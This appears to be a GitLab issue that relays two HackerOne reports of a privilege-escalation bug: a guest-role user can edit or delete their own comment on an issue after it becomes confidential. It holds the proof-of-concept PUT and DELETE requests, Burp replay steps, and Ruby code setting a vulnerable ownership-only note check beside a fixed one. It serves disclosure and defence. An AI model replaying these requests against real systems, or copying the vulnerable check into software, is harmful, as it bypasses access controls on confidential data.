Guest user editing/deleting his own comments
An external contributor reported via HackerOne an issue regarding editing/deleting comments as a guest user. I could successfully reproduce the reported behavior and I would like to verify with the product team if this behavior is intended.
The HackerOne reports can be found at:
Please find the report details below.
Title: Guest permission user can edit his comment from other user's confidential issue in project
Scope: *.gitlab.com
Weakness: Privilege Escalation
Severity: No Rating
Link: https://hackerone.com/reports/406070
Date: 2018-09-05 13:10:13 +0000
By: @sandeep_hodkasia
Details:
Summary: Guest permission user can edit his comment from other user's confidential issue in project
Description: Guest role users are not allowed to access other users' confidential issues, and thus are not allowed to edit or delete any comment there. But privilege escalation on the vulnerable request allows a guest role user to edit his own comment and modify it in another user's confidential issue in the project. Please note: using this bug, a guest role user can edit his own comment which was created before the issue was made confidential by the other user.
## Vulnerable request:

```http
PUT /sandeep01/test/notes/99078322 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 65
Accept: application/json, text/plain, */*
Origin: https://gitlab.com
X-CSRF-Token: xxxx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://gitlab.com/sandeep01/test/issues/4
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: xxxx

target_type=issue&target_id=13921643&note%5Bnote%5D=helloasdfghjk
```
Steps To Reproduce:
- Add any comment on another user's open issue in the project using a guest role user account.
- Change the issue to confidential.
- Replay the vulnerable request in Burp using the guest role user session.
- Use your target id and note id in the vulnerable request.
- Hit the API.
- The comment will be changed.
## Impact
Guest role user can edit comment in confidential issue.
Title: Guest role user can delete his comment from other user's confidential issue in project
Scope: *.gitlab.com
Weakness: Privilege Escalation
Severity: No Rating
Link: https://hackerone.com/reports/406076
Date: 2018-09-05 13:32:39 +0000
By: @sandeep_hodkasia
Details:
Summary: Guest role user can delete his comment from other user's confidential issue in project
Description: Guest role users are not allowed to access other users' confidential issues in the project, and thus are not allowed to delete any comment there. But the privilege on the vulnerable request allows a guest role user to delete his comment from another user's confidential issue in the project. Please note that the guest role user can only delete his own comment, which was created by him before the issue was made confidential.
## Vulnerable request:

```http
DELETE /sandeep01/test/notes/99077678 HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/sandeep01/test/issues/4
X-CSRF-Token: xxxx
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Cookie: xxxx
Connection: close
```
Steps To Reproduce:
- Add a new comment on another user's open issue in the project using the guest role user session.
- Change the issue to a confidential issue.
- Replay the vulnerable request in Burp Suite using the guest role user session.
- Use your project name, issue name and note id in the vulnerable request.
- Hit the API.
- The comment will be deleted.
## Impact
Guest role user can delete comment from confidential issue.
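Both reports share one root cause: the note update and delete endpoints authorise on note ownership alone, without re-checking that the user can still read the parent issue after it was made confidential. The following Ruby is an added illustration of that ownership-only check beside a hardened one; it is not GitLab's code, and the access levels, structs and confidential-issue visibility rule are simplified assumptions made for the example.

```ruby
# Added illustration (not GitLab's code). Access levels and the visibility
# rule below are simplified assumptions modelled on the reports above.
GUEST = 10
REPORTER = 20

Issue   = Struct.new(:id, :author, :assignees, :confidential)
Note    = Struct.new(:id, :author, :noteable)
Project = Struct.new(:members) # members: { user => access_level }

# Can this user still read the issue the note belongs to?
# Assumption: a confidential issue is visible only to its author, its
# assignees, or project members at Reporter level and above.
def can_read_issue?(project, user, issue)
  return true unless issue.confidential
  return true if issue.author == user || issue.assignees.include?(user)
  project.members.fetch(user, 0) >= REPORTER
end

# Vulnerable shape: authorises PUT/DELETE on ownership alone. Once the parent
# issue becomes confidential the guest's old note is still "theirs", so this
# check keeps passing.
def vulnerable_modify_note?(_project, user, note)
  note.author == user
end

# Hardened shape: ownership AND continued read access to the parent noteable.
# The same guard belongs in front of both the update and the delete handler.
def can_modify_note?(project, user, note)
  note.author == user && can_read_issue?(project, user, note.noteable)
end

# Constructed scenario mirroring the reports: a guest comments on an open
# issue, then the issue owner flips it to confidential.
def scenario
  owner, guest = "owner", "guest"
  project = Project.new({ owner => 40, guest => GUEST })
  issue = Issue.new(4, owner, [], false)
  note = Note.new(99, guest, issue)
  before = [vulnerable_modify_note?(project, guest, note),
            can_modify_note?(project, guest, note)]
  issue.confidential = true
  after = [vulnerable_modify_note?(project, guest, note),
           can_modify_note?(project, guest, note)]
  { before: before, after: after } # before: [true, true]; after: [true, false]
end
```

Before the issue is made confidential both checks allow the guest's edit; afterwards only the vulnerable check still does, which is exactly the behaviour the two reports describe.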